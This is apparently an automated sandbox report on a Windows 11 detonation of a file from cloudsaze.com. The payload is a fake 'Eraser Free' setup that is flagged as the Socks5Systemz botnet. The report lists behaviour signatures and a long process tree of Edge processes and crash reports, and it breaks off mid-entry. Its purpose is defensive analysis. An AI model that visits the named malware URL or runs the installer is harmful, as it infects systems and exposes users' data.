Analysis

  • max time kernel
    161s
  • max time network
    163s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-uk
  • resource tags

    arch:x64arch:x86image:win11-20250313-uklocale:uk-uaos:windows11-21h2-x64systemwindows
  • submitted
    08/04/2025, 13:01

General

  • Target

    https://cloudsaze.com/file/fd592a

Malware Config

Signatures

  • Detect Socks5Systemz Payload 1 IoCs
  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Socks5systemz family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 1 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 16 IoCs
  • Indirect Command Execution 1 TTPs 3 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 5 IoCs
  • Drops file in Windows directory 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 39 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cloudsaze.com/file/fd592a
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3516
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x26c,0x7fff2196f208,0x7fff2196f214,0x7fff2196f220
      2⤵
        PID:2360
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=uk --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=2340 /prefetch:11
        2⤵
          PID:2292
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:2
          2⤵
            PID:1404
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=uk --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2416,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:13
            2⤵
              PID:5048
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3436,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:1
              2⤵
                PID:3776
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3444,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=3460 /prefetch:1
                2⤵
                  PID:2448
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4120,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:1
                  2⤵
                    PID:4936
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4152,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:9
                    2⤵
                      PID:1312
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4228,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:1
                      2⤵
                        PID:4476
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4244,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:9
                        2⤵
                          PID:4968
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5336,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:14
                          2⤵
                            PID:1444
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5328,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:14
                            2⤵
                              PID:5384
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3548,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:1
                              2⤵
                                PID:5600
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=uk --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5572,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:14
                                2⤵
                                  PID:5580
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=uk --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5456,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:14
                                  2⤵
                                    PID:1632
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=4176,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:1
                                    2⤵
                                      PID:2960
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=uk --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:14
                                      2⤵
                                        PID:3668
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=uk --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6396,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:14
                                        2⤵
                                          PID:2136
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
                                            cookie_exporter.exe --cookie-json=1128
                                            3⤵
                                              PID:2568
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=uk --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:14
                                            2⤵
                                              PID:2436
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4380,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:14
                                              2⤵
                                                PID:2240
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6764,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6772 /prefetch:14
                                                2⤵
                                                  PID:2704
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6888,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:14
                                                  2⤵
                                                    PID:4844
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6876,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:14
                                                    2⤵
                                                      PID:4356
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5376,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:14
                                                      2⤵
                                                        PID:5100
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7408,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7404 /prefetch:14
                                                        2⤵
                                                          PID:4048
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7276,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7564 /prefetch:14
                                                          2⤵
                                                            PID:2424
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6500,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:14
                                                            2⤵
                                                              PID:3668
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6800,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7852 /prefetch:14
                                                              2⤵
                                                                PID:2724
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=4492,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:1
                                                                2⤵
                                                                  PID:5324
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=4532,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
                                                                  2⤵
                                                                    PID:1828
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=uk --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=3424 /prefetch:14
                                                                    2⤵
                                                                      PID:3452
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=uk --js-flags=--ms-user-locale=uk_UA --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=4696,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:1
                                                                      2⤵
                                                                        PID:1624
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=uk --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5968,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6792 /prefetch:14
                                                                        2⤵
                                                                        • NTFS ADS
                                                                        PID:5704
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=uk --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6456,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7592 /prefetch:14
                                                                        2⤵
                                                                          PID:1512
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=uk --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4500,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7176 /prefetch:14
                                                                          2⤵
                                                                            PID:1440
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=uk --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4136,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:14
                                                                            2⤵
                                                                              PID:5652
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=uk --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:14
                                                                              2⤵
                                                                                PID:5344
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:14
                                                                                2⤵
                                                                                  PID:5340
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7096,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:14
                                                                                  2⤵
                                                                                    PID:5984
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2016,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=5696 /prefetch:14
                                                                                    2⤵
                                                                                      PID:3992
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4408,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:10
                                                                                      2⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:5196
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=uk --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6368,i,14521530051229804224,11832729697628166779,262144 --variations-seed-version --mojo-platform-channel-handle=6420 /prefetch:14
                                                                                      2⤵
                                                                                        PID:1364
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                      1⤵
                                                                                        PID:5060
                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                        1⤵
                                                                                          PID:5876
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_setup_QrNLVNg6Qk.zip\setup_QrNLVNg6Qk.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_setup_QrNLVNg6Qk.zip\setup_QrNLVNg6Qk.exe"
                                                                                          1⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6112
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-7HMR6.tmp\setup_QrNLVNg6Qk.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-7HMR6.tmp\setup_QrNLVNg6Qk.tmp" /SL5="$90106,7009929,54272,C:\Users\Admin\AppData\Local\Temp\Temp1_setup_QrNLVNg6Qk.zip\setup_QrNLVNg6Qk.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5036
                                                                                            • C:\Users\Admin\AppData\Local\Eraser Free 3.1.1.882\eraserfree882.exe
                                                                                              "C:\Users\Admin\AppData\Local\Eraser Free 3.1.1.882\eraserfree882.exe" 8332b2d0ca920599c223f3f8ba57feaa
                                                                                              3⤵
                                                                                              • Downloads MZ/PE file
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4892
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 840
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2320
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 848
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2828
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 920
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5356
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1052
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2104
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1032
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2436
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1080
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:4832
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1072
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5948
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1072
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:3116
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1112
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:1004
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1072
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5824
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 964
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5160
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1568
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:5432
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1100
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:892
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1652
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2248
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1100
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                PID:2136
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1692
